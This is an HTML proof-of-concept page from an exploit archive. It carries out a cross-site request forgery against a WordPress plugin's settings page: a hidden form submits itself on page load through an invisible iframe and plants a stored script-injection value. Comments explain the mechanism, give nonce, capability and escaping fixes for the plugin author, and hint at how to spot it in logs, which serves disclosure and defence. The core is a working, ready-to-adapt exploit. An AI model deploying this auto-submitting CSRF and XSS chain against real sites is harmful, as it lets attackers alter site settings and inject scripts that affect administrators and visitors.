## https://sploitus.com/exploit?id=WPEX-ID:9547040E-E96C-43E3-9EA9-ACF45A300D62
<!DOCTYPE html>

<html>
<!--
  Cross-site request forgery (CSRF) proof of concept against a WordPress
  admin settings page (options-general.php?page=post-index) on a localhost
  test install.

  What the page does: when it loads, it posts the hidden form below to the
  settings URL without any user interaction. The request is sent by the
  visitor's browser, so it carries whatever WordPress session that browser
  already holds for the target site.

  What it demonstrates: the form contains no anti-CSRF token field. The
  premise (not shown on this page; confirm against the plugin source) is
  that the settings handler saves the submitted values without verifying a
  nonce, and that one saved value is later output without escaping.

  Fix side, for the plugin author: emit a nonce in the real settings form
  with wp_nonce_field(), verify it with check_admin_referer() together with
  a current_user_can() capability check before saving, and escape stored
  values on output with esc_attr() / esc_html().

  NOTE(review): in server logs this would presumably show up as a POST to
  the settings page whose Origin/Referer is not the site's own admin area;
  confirm against what your logging actually records.
-->
<head>
<meta charset="utf-8">
<title>CSRF PoC</title>
</head>

<!-- onload triggers the submission as soon as the document has loaded. -->
<body onload="csrfSubmit();">
<!--
  target="dummyfrm" sends the response into the hidden iframe further down,
  so the visible page does not navigate. The field names and values mirror
  a normal "Save Changes" submission of the plugin's settings form.
-->
<form target="dummyfrm" name="evilform" action="
http://localhost/wordpress/wp-admin/options-general.php?page=post-index"
method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="updateSettings" value="1" />
<input type="hidden" name="defaultCategory" value="" />
<input type="hidden" name="showGroupCount" value="1" />
<input type="hidden" name="pageDescription" value="" />
<input type="hidden" name="postLabel[0]" value="posts" />
<input type="hidden" name="postLabel[1]" value="one post" />
<input type="hidden" name="postLabel[2]" value=" posts" />
<input type="hidden" name="infoSeparator[0]" value="also at " />
<input type="hidden" name="infoSeparator[1]" value=", " />
<input type="hidden" name="infoSeparator[2]" value=" and " />
<input type="hidden" name="infoSeparator[3]" value="" />
<!--
  This field carries the harmless alert(1) marker used to show that the
  stored setting is reflected unescaped (stored XSS chained from the CSRF).
  NOTE(review): as shown here the attribute value is not entity-encoded, so
  the listing is probably not byte-faithful to the original PoC; this looks
  like an artifact of how the page was extracted. Left as found.
-->
<input type="hidden" name="infoLinksName[0]"
value=""><script>alert(1);</script>" />
<input type="hidden" name="infoLinksField[0]" value="hoge" />
<input type="hidden" name="submit" value="Save Changes" />
</form>
<!-- 1x1 invisible frame that receives the form response (see target above). -->
<iframe src="x" width="1" height="1" name="dummyfrm"
style="visibility:hidden"></iframe>
<script>
// Submits the form named "evilform"; invoked from the body onload handler.
function csrfSubmit(){
    // The form has a control named "submit", which shadows the form's own
    // submit() method, so the method is taken from the prototype and bound
    // to the form instead of being called as document.evilform.submit().
    let submit =
HTMLFormElement.prototype["submit"].bind(document.evilform);
    submit();
}
</script>

<p>CSRF PoC</p>
</html>